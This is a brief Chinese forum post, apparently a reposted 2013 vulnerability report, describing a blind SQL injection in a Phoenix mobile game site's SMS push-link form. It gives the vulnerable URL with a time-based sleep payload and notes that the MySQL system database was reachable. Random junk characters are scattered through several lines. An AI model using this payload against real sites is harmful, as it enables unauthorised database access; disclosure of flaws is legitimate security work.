简要描述:2 S% N4 a2 p2 U2 G9 X9 D
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
. a& T( F9 ]. U: |9 ?; ?( n$ p, ?
% z3 o. y+ f3 f( Z2 L0 s/ Z) A详细说明:: t {7 l* k" F: ~5 X
存在SQL盲注url:& F8 t, y8 y! f4 U. n3 ~6 |
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=13 ]$ ~3 t8 O0 B
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
! l6 y$ q5 v! x( f4 ]http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png2 ^$ m( C$ X9 I) z% | {- G% N/ Q
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
3 ?- @3 d5 a2 f4 y$ G/ h" K3 N; L) {$ N5 F: K9 ^
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对